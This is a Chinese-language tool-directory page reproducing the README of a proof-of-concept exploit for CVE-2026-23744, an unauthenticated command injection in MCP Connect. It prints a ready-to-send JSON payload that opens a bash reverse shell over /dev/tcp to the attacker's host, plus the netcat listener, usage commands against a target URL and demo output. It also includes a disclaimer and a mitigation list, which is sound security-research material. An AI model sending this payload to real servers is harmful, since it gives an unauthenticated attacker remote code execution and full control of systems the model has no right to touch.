Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/cylock11/cve-2026-23744
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubcylock11/cve-2026-23744

CVE-2026-23744

CVE-2026-23744 的概念验证漏洞利用程序,该漏洞是 MCP Connect 中一个未经验证的命令注入漏洞,可导致远程代码执行和反弹 Shell。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23744 — MCP Connect RCE 通过未认证命令注入

Python Category Type License

⚠️ 免责声明: 本仓库仅用于教育和安全研究目的。在未经明确授权的情况下对系统使用此漏洞利用程序是非法的。作者不对滥用此代码的行为承担任何责任。


📌 漏洞描述

该漏洞位于 /api/mcp/connect 端点,允许未认证的攻击者注册一个带有恶意配置的任意 MCP(模型上下文协议)服务器。由于 command 字段及其 args 参数缺乏验证和清理,攻击者可以注入操作系统命令,这些命令将以 Web 进程的权限直接在服务器上执行。

这会导致远程代码执行(RCE),可被利用来在受攻击的系统上获取反向 shell。


🧠 技术细节

字段详情
类型远程代码执行(RCE)
攻击向量网络(无需认证的 HTTP POST)
端点/api/mcp/connect
严重性🔴 严重
认证不需要
影响完全控制服务器

恶意 Payload

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

服务器处理此配置并调用带有指定参数的 bash 命令,从而与攻击者建立反向 TCP 连接。


🛠️ 要求

  • Python 3.x
  • 以下库:
root@kitploit:~
pip install requests termcolor

🚀 使用方法

root@kitploit:~
python3 exploit.py -l <你的IP> -u <目标URL>

参数

参数描述示例
-l你的 IP(用于接收 shell)192.168.1.50
-u目标的基础 URLhttps://victim.com

完整示例

终端 1 — 监听器:

root@kitploit:~
nc -nlvp 443

终端 2 — 漏洞利用:

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 演示

root@kitploit:~
[-] 请在另一个终端中执行以下命令:

[+] nc -nlvp 443

[-] 命令执行完成后按 'Enter' 键...

[+] 正在发送攻击请求...

请求发送后,端口 443 上的监听器将收到来自受攻击服务器的反向连接,并获得交互式 shell。


🛡️ 缓解措施

  • 在处理 /api/mcp/connect 中的请求体之前,验证并清理所有字段。
  • 对端点进行认证,并仅限制具有权限的用户访问。
  • 切勿直接根据用户输入执行系统命令。
  • 实施允许命令的白名单。
  • 对 Web 服务器进程应用最小权限原则。

📁 仓库结构

root@kitploit:~
.
├── exploit.py       # 漏洞利用主脚本
└── README.md        # 本文件

👤 作者

由 Jorge Arana Fedriani 为进攻性安全研究目的而开发。

下载工具